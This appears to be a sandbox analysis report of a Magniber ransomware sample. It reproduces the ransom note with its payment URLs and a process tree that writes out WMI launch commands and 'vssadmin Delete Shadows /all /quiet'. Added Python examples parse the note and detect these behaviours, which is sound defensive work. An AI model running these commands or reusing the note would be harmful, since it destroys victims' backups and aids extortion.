Analysis

  • max time kernel
    280s
  • max time network
    273s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    22-07-2021 19:24

General

  • Target

    magnibar_fc1cb9ea6c1d86600f690b0f7c7ea6ab73d401a3b0e899360c4a619aeaed4cc4.exe

  • Size

    21KB

  • MD5

    3802b905937b9212384ce6ed7241d96c

  • SHA1

    9ef9f19a2327bce05bbb5cc23021f5c2b7cd1cec

  • SHA256

    fc1cb9ea6c1d86600f690b0f7c7ea6ab73d401a3b0e899360c4a619aeaed4cc4

  • SHA512

    bac5dc5c299979461ad7eb3f329c9b61042b3d7cb261acdcdd14111741a549c986ea19c871564d9c799d2da7a042ab9f1918efcfcddc3bfe51a4d1aaf3c39d9b

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here:
http://80504cc06614c04092hwcbxhw.5s4ixqul2enwxrqv.onion/hwcbxhw
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://80504cc06614c04092hwcbxhw.plughas.casa/hwcbxhw
http://80504cc06614c04092hwcbxhw.dayhit.xyz/hwcbxhw
http://80504cc06614c04092hwcbxhw.ownhits.space/hwcbxhw
http://80504cc06614c04092hwcbxhw.bestep.cyou/hwcbxhw
Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://80504cc06614c04092hwcbxhw.5s4ixqul2enwxrqv.onion/hwcbxhw

http://80504cc06614c04092hwcbxhw.plughas.casa/hwcbxhw

http://80504cc06614c04092hwcbxhw.dayhit.xyz/hwcbxhw

http://80504cc06614c04092hwcbxhw.ownhits.space/hwcbxhw

http://80504cc06614c04092hwcbxhw.bestep.cyou/hwcbxhw
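
The note leaks the whole per-victim configuration: a hex-looking victim ID with a seven-character token appended as the subdomain, that same token as the URL path, and (see the Downloads section) the same token appended as the extension of every encrypted file, e.g. AddInstall.potx.hwcbxhw. The Python below is an added example, not part of this report or of any Magniber tooling, that pulls those values out of the note text and uses the recovered extension to list encrypted files. The note text and file names are copied from this report; that the path token equals the file extension is an observation about this sample, not a documented property of the family, so treat the check as a heuristic.

```python
import re
from urllib.parse import urlsplit

# Ransom note as the sandbox extracted it from C:\Users\Admin\Desktop\readme.txt (copied from this report).
RANSOM_NOTE = """ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here:
http://80504cc06614c04092hwcbxhw.5s4ixqul2enwxrqv.onion/hwcbxhw
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://80504cc06614c04092hwcbxhw.plughas.casa/hwcbxhw
http://80504cc06614c04092hwcbxhw.dayhit.xyz/hwcbxhw
http://80504cc06614c04092hwcbxhw.ownhits.space/hwcbxhw
http://80504cc06614c04092hwcbxhw.bestep.cyou/hwcbxhw
Note! These are temporary addresses! They will be available for a limited amount of time!
"""

# File names taken from the Downloads section of this report, plus two that must not match.
SAMPLE_FILES = [
    r"C:\Users\Admin\Desktop\AddInstall.potx.hwcbxhw",
    r"C:\Users\Admin\Desktop\OptimizeSync.jpg.hwcbxhw",
    r"C:\Users\Admin\Desktop\readme.txt",
    r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\PIYIXMFQ.txt",
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def extract_urls(note):
    """All http(s) URLs in the note, in order of appearance, deduplicated."""
    seen, urls = set(), []
    for url in URL_RE.findall(note):
        if url not in seen:
            seen.add(url)
            urls.append(url)
    return urls


def parse_payment_url(url):
    """Split a payment URL into victim subdomain, registered domain and path token."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    labels = host.split(".")
    return {
        "url": url,
        "victim_subdomain": labels[0] if len(labels) > 2 else "",
        "registered_domain": ".".join(labels[-2:]),
        "path_token": parts.path.strip("/"),
        "onion": host.endswith(".onion"),
    }


def extract_config(note):
    """Derive the per-victim parameters the note leaks: onion page, clearnet mirrors,
    and the token that (in this sample) doubles as the extension on encrypted files."""
    entries = [parse_payment_url(u) for u in extract_urls(note) if "torproject.org" not in u]
    if not entries:
        raise ValueError("no payment URLs found; not a Magniber-style note")
    tokens = {e["path_token"] for e in entries}
    subdomains = {e["victim_subdomain"] for e in entries}
    if len(tokens) != 1 or len(subdomains) != 1:
        raise ValueError("payment URLs disagree on the victim token: %r" % (tokens | subdomains))
    token = tokens.pop()
    subdomain = subdomains.pop()
    return {
        "victim_subdomain": subdomain,
        "extension": "." + token,
        # Observed on this sample: the subdomain is a hex victim ID with the token appended.
        "subdomain_ends_with_token": subdomain.endswith(token),
        "onion_urls": [e["url"] for e in entries if e["onion"]],
        "mirror_domains": [e["registered_domain"] for e in entries if not e["onion"]],
    }


def encrypted_files(paths, extension):
    """(encrypted path, original path) for every path carrying the per-victim extension."""
    ext = extension.lower()
    return [(p, p[: -len(ext)]) for p in paths if p.lower().endswith(ext)]


if __name__ == "__main__":
    cfg = extract_config(RANSOM_NOTE)
    print(cfg)
    for enc, orig in encrypted_files(SAMPLE_FILES, cfg["extension"]):
        print(enc, "->", orig)
```

The mirror domains are worth blocking as a set rather than one at a time: the note itself says they are temporary, so the victim subdomain and path token are the stable indicators, and the registered domains are what rotates.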

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1260
    • C:\Users\Admin\AppData\Local\Temp\magnibar_fc1cb9ea6c1d86600f690b0f7c7ea6ab73d401a3b0e899360c4a619aeaed4cc4.exe
      "C:\Users\Admin\AppData\Local\Temp\magnibar_fc1cb9ea6c1d86600f690b0f7c7ea6ab73d401a3b0e899360c4a619aeaed4cc4.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1724
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:656
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1576
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:732
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1224
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1848
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1588
  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1124
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1368
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://80504cc06614c04092hwcbxhw.plughas.casa/hwcbxhw^&1^&39803775^&70^&347^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1980
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://80504cc06614c04092hwcbxhw.plughas.casa/hwcbxhw&1&39803775&70&347&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1812 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1772
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1964
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1636
  • C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    1⤵
    PID:772
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1432
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1640
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:568
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1052
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1116
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:2088
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:520
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:772
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1076
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1636
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:360
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2248
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2272
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2264
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2332
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:2388
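
The tree shows the shadow-copy deletion twice removed from the sample: the injected taskhost.exe runs wmic process call create to start cmd /c CompMgmtLauncher.exe, CompMgmtLauncher.exe then runs wmic again to start vssadmin.exe Delete Shadows /all /quiet. Both WMI-created processes appear as roots (1⤵) because Win32_Process.Create launches them from WmiPrvSE.exe, so the sandbox loses the lineage. CompMgmtLauncher.exe is an auto-elevating Microsoft binary that in normal use only launches mmc.exe; the report's "Modifies registry class" and "Process spawned unexpected child process" signatures are consistent with its file-handler being hijacked, but the report does not show which key was written, so the rule below keys only on the parent/child relation that is visible. The Python below is an added example, not code from the report or from the sample: it re-stitches the WMI gap by matching the quoted command in each wmic call to the later process whose command line equals it, and runs four detection rules over Sysmon-style process-creation events. The event list is reconstructed from the tree; the parent PIDs, the WmiPrvSE.exe parent (PID 9999) and the pairing of wmic.exe PID 568 with vssadmin.exe PID 2248 are assumptions, since the report records none of them.

```python
import ntpath
import re

# Process-creation events (pid, ppid, image, command line) reconstructed from the tree above. The
# report gives no parent PIDs, so they are filled in from the tree's nesting. Processes the tree shows
# as roots were launched through WMI's Win32_Process.Create, so in a Sysmon Event ID 1 log their parent
# would be WmiPrvSE.exe; that parent (PID 9999 here) and the pairing of wmic.exe 568 with
# vssadmin.exe 2248 are assumptions of this example, not facts from the report.
EVENTS = [
    (1124, 480,  r"C:\Windows\system32\taskhost.exe", r'"taskhost.exe"'),
    (1368, 1124, r"C:\Windows\system32\notepad.exe", r"notepad.exe C:\Users\Public\readme.txt"),
    (1980, 1124, r"C:\Windows\system32\cmd.exe",
     r'cmd /c "start http://80504cc06614c04092hwcbxhw.plughas.casa/hwcbxhw^&1^&39803775^&70^&347^&12"'),
    (1964, 1124, r"C:\Windows\system32\cmd.exe",
     r'cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""'),
    (1636, 1964, r"C:\Windows\system32\wbem\WMIC.exe",
     r'C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"'),
    (9999, 480,  r"C:\Windows\system32\wbem\WmiPrvSE.exe", r"WmiPrvSE.exe"),   # assumed, see above
    (1432, 9999, r"C:\Windows\system32\cmd.exe", r"cmd /c CompMgmtLauncher.exe"),
    (1640, 1432, r"C:\Windows\system32\CompMgmtLauncher.exe", r"CompMgmtLauncher.exe"),
    (568,  1640, r"C:\Windows\system32\wbem\wmic.exe",
     r'"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"'),
    (2248, 9999, r"C:\Windows\system32\vssadmin.exe", r"vssadmin.exe Delete Shadows /all /quiet"),
]

WMI_CREATE = re.compile(r'process\s+call\s+create\s+"(.+)"\s*$', re.I)
SHADOW_DEL = re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)


def base(image):
    return ntpath.basename(image).lower()


def norm(cmd):
    return " ".join(cmd.split()).lower()


def resolve_parents(events):
    """Index of each event's parent event, or None. Resolved by (ppid, order) rather than by PID
    alone because PIDs are recycled: the tree above shows 772 and 1636 each used by two processes."""
    parent = {}
    for i, (_, ppid, _, _) in enumerate(events):
        earlier = [j for j in range(i) if events[j][0] == ppid]
        parent[i] = earlier[-1] if earlier else None
    return parent


def stitch_wmi(events, parent):
    """Map a WMI-created process back to the wmic.exe that requested it by matching the quoted
    command in 'wmic process call create "..."' against a later process's command line."""
    links, taken = {}, set()
    for i, (_, _, image, cmd) in enumerate(events):
        if base(image) != "wmic.exe":
            continue
        m = WMI_CREATE.search(cmd)
        if not m:
            continue
        target = norm(m.group(1))
        for j in range(i + 1, len(events)):
            p = parent[j]
            if j in taken or norm(events[j][3]) != target:
                continue
            if p is None or base(events[p][2]) == "wmiprvse.exe":
                links[j] = i
                taken.add(j)
                break
    return links


def lineage(events, parent, links, i):
    """Root-to-leaf chain of image names for event i; '~>' marks a hop stitched across WMI."""
    chain = [base(events[i][2])]
    while True:
        if i in links:
            i, hop = links[i], "~>"
        elif parent[i] is not None:
            i, hop = parent[i], ">"
        else:
            return " ".join(reversed(chain))
        chain += [hop, base(events[i][2])]


def detect(events):
    """Run the rules and attach the full (WMI-stitched) lineage to every alert."""
    parent = resolve_parents(events)
    links = stitch_wmi(events, parent)
    alerts = []
    for i, (pid, _, image, cmd) in enumerate(events):
        name = base(image)
        pname = base(events[parent[i]][2]) if parent[i] is not None else None
        hits = []
        if SHADOW_DEL.search(cmd):
            hits.append("shadow_copy_deletion")              # ATT&CK T1490, Inhibit System Recovery
        if name == "wmic.exe" and WMI_CREATE.search(cmd):
            hits.append("wmi_process_create")                # ATT&CK T1047, WMI as a process launcher
        if pname == "compmgmtlauncher.exe" and name != "mmc.exe":
            hits.append("auto_elevating_binary_unexpected_child")   # it should only start mmc.exe
        if name == "cmd.exe" and re.search(r"\bstart\s+https?://", cmd, re.I):
            hits.append("shell_launches_url")                # payment page opened for the victim
        alerts.extend({"pid": pid, "image": name, "rule": h,
                       "chain": lineage(events, parent, links, i)} for h in hits)
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a["pid"], a["rule"], "|", a["chain"])
```

Matching on the quoted command string is deliberate: the wmic.exe invocation shows the intent (vssadmin.exe Delete Shadows) before vssadmin.exe itself runs, so the wmic event alone is enough to alert on, and the stitched chain is what lets the alert point back at the injected taskhost.exe rather than at WmiPrvSE.exe. On a real host use Sysmon's ProcessGuid instead of the PID-plus-order resolution used here.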

              Network

              MITRE ATT&CK Enterprise v6

              Downloads

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\PIYIXMFQ.txt

                MD5

                0a288b0a7a37896592013d622f464dec

                SHA1

                9dd97cdc983b259b8a6a9d0b6a078a6bcb02c391

                SHA256

                0aa107809df4dd69c2dc120eadb77a1ce3b6d40b11c7c5e8afbb137acdfdfbb5

                SHA512

                28b18866f09d6f8c017d6b56bc54f8fb6c203891b1739b5b17a152ff90e117b95e91502036eba3b36392b0345c0db1cb44bb327b5512fc362815cb930ad2e165

              • C:\Users\Admin\Desktop\AddInstall.potx.hwcbxhw

                MD5

                e08dcd1cc8ddf5a1f930e02efd30fdbc

                SHA1

                a52acd53e448d22d7bbc4dd25595befc9a1e63b6

                SHA256

                2da3acbfcd951d33c281709ed0c9240d8e3fd1ec4b217f02a0e4a2f242939ca0

                SHA512

                6555feba4c025596af3e96fdb44574c64db90ab2929777e8eae0bc5c6e760a4a33fa5dbbc83d6db6c43cff512dc75031ec00da959571115487be2cce9fe5c749

              • C:\Users\Admin\Desktop\DenyPop.xps.hwcbxhw

                MD5

                b30cb150a8d25a58f524d63b63aef228

                SHA1

                3edf7db0d5ce0aeac6712d1a52e6c2ece8412ffa

                SHA256

                52a3a388785bb5309d1a843a1ab21c656aa469627829e65abc401f44a0bb58af

                SHA512

                e7c741edc7e4bf82fc180ea5233edacb05d9758c4b6df0f9a1203c4d5e7d4676c679a480eff562c33e75a0ce0be51de95be6d5e12db0721513b9d118c62ed706

              • C:\Users\Admin\Desktop\ExitNew.pot.hwcbxhw

                MD5

                71a1c830942dbf1649e8bc36cd166f49

                SHA1

                08df0f6e54bad765bec0a89e56e772df9d5f9969

                SHA256

                1182a8d52e1c870329a5ee928ef4e93c06838dbf90d696be285f385d0f3211b0

                SHA512

                685693da78de0756eff3dd6b1f94cabd98ededf685bff4deebd3f806d067c6f0805a92fdcdd9a630bda31e8e3c1a2b70ef46c572be4191081a775fd02f9660dd

              • C:\Users\Admin\Desktop\OptimizeSync.jpg.hwcbxhw

                MD5

                61fcaecd7bbf3057908aafb8db9a9658

                SHA1

                384e73d1989c59ca8c8e9f401ccde13a7b0082ba

                SHA256

                1924340c678e53e66b1d746d4d42fff2792a37fc5917235b76a0dd6fcb0ae818

                SHA512

                ae3b2938c472850a5efe4b36d9e8cdd6778233f78a31b186923c4dbcc58308c34648b96374cbcf3772b5b1494e377860dc162901aa8ded0cd75dc1fe81fa3e92

              • C:\Users\Admin\Desktop\ResolveResume.tif.hwcbxhw

                MD5

                0de0a40dbdc9edc6045f1261367ba7e5

                SHA1

                d17722c7cebc44648d834dc90d7e5af0c2ba2b32

                SHA256

                4d58f1539f92c2d0d78633777229b8e4860843056c290670cd3d2e5feb0f0baa

                SHA512

                5f70dc8a89aafaabf84214b34064e26e482c7869ee6de6d522796180a5d78c431c65a93f236454c26f7fed38011cba513714ea0c47561da2e296ad2715462b01

              • C:\Users\Admin\Desktop\ResolveShow.potx.hwcbxhw

                MD5

                be534ba0021c24cf362e7b5446d8fabf

                SHA1

                9cb5799741df6e4a65b5d7a5e718183a8b8b5717

                SHA256

                b25a38f4759f291a01c81bca70da1f3396582b8e8b273f9c5e415577f9bc71c5

                SHA512

                b245889309e661f5c34f8839dca5795d605dbbf811186a03f82c9c4b823be527a1b7862a6b0ccae897f48e6e2bd325810e61e945d4823c972b7d8b8330bc4d61

              • C:\Users\Admin\Desktop\SaveConnect.rtf.hwcbxhw

                MD5

                e6626fe6c3f2c5a627c393304a21f070

                SHA1

                899ec147e1eb9942f027097e167eccde06074224

                SHA256

                8edb877161321018ea3a0ea7e3ed688ffc2fe48bbe4bda4c17936e4274fd6d58

                SHA512

                572953a9af52914a0c38b0063da16218237fb83cbbaf6158cfbf87ab90dc7baee0801a295baa2ed39bd6a147b2e1d3c329bab14a9e852e2cf04d33910d9468e5

              • C:\Users\Admin\Desktop\readme.txt

                MD5

                1ac8900f1f3c48678830b4c3caf07fcb

                SHA1

                349e7f96bdfaff3d10b74b533cd9dfc89f5000c2

                SHA256

                32fddfa16ec6e99265417bc0813306a9f8d19754c3458da4599dc5dcba53a119

                SHA512

                b3532eb3a0f509d53af7b1aba64285397ec2b495d00807d8b5c47802308f35aedfc7d0f57e915b29f71f76b924744c189d122435687f117bf18752b33f2e4a22

              • C:\Users\Public\readme.txt

                MD5

                1ac8900f1f3c48678830b4c3caf07fcb

                SHA1

                349e7f96bdfaff3d10b74b533cd9dfc89f5000c2

                SHA256

                32fddfa16ec6e99265417bc0813306a9f8d19754c3458da4599dc5dcba53a119

                SHA512

                b3532eb3a0f509d53af7b1aba64285397ec2b495d00807d8b5c47802308f35aedfc7d0f57e915b29f71f76b924744c189d122435687f117bf18752b33f2e4a22

              • memory/360-106-0x0000000000000000-mapping.dmp

              • memory/568-108-0x0000000000000000-mapping.dmp

              • memory/656-88-0x0000000000000000-mapping.dmp

              • memory/732-90-0x0000000000000000-mapping.dmp

              • memory/772-95-0x0000000000000000-mapping.dmp

              • memory/772-98-0x0000000000000000-mapping.dmp

              • memory/1076-107-0x0000000000000000-mapping.dmp

              • memory/1116-100-0x0000000000000000-mapping.dmp

              • memory/1124-79-0x0000000000210000-0x0000000000214000-memory.dmp

                Filesize

                16KB

              • memory/1260-60-0x0000000002650000-0x0000000002660000-memory.dmp

                Filesize

                64KB

              • memory/1368-62-0x000007FEFB571000-0x000007FEFB573000-memory.dmp

                Filesize

                8KB

              • memory/1368-61-0x0000000000000000-mapping.dmp

              • memory/1576-84-0x0000000000000000-mapping.dmp

              • memory/1588-83-0x0000000000000000-mapping.dmp

              • memory/1636-101-0x0000000000000000-mapping.dmp

              • memory/1636-82-0x0000000000000000-mapping.dmp

              • memory/1640-99-0x0000000000000000-mapping.dmp

              • memory/1724-71-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                Filesize

                4KB

              • memory/1724-65-0x00000000000E0000-0x00000000000E1000-memory.dmp

                Filesize

                4KB

              • memory/1724-68-0x0000000000110000-0x0000000000111000-memory.dmp

                Filesize

                4KB

              • memory/1724-73-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

                Filesize

                4KB

              • memory/1724-69-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                Filesize

                4KB

              • memory/1724-74-0x0000000001D00000-0x0000000001D01000-memory.dmp

                Filesize

                4KB

              • memory/1724-75-0x0000000001D10000-0x0000000001D11000-memory.dmp

                Filesize

                4KB

              • memory/1724-64-0x0000000000020000-0x0000000000025000-memory.dmp

                Filesize

                20KB

              • memory/1724-96-0x0000000002390000-0x0000000002391000-memory.dmp

                Filesize

                4KB

              • memory/1724-67-0x0000000000100000-0x0000000000101000-memory.dmp

                Filesize

                4KB

              • memory/1724-76-0x0000000001D20000-0x0000000001D21000-memory.dmp

                Filesize

                4KB

              • memory/1724-66-0x00000000000F0000-0x00000000000F1000-memory.dmp

                Filesize

                4KB

              • memory/1724-77-0x0000000001D30000-0x0000000001D31000-memory.dmp

                Filesize

                4KB

              • memory/1772-97-0x0000000000000000-mapping.dmp

              • memory/1812-81-0x0000000000000000-mapping.dmp

              • memory/1848-80-0x0000000000000000-mapping.dmp

              • memory/1964-72-0x0000000000000000-mapping.dmp

              • memory/1980-70-0x0000000000000000-mapping.dmp

              • memory/2088-109-0x0000000000000000-mapping.dmp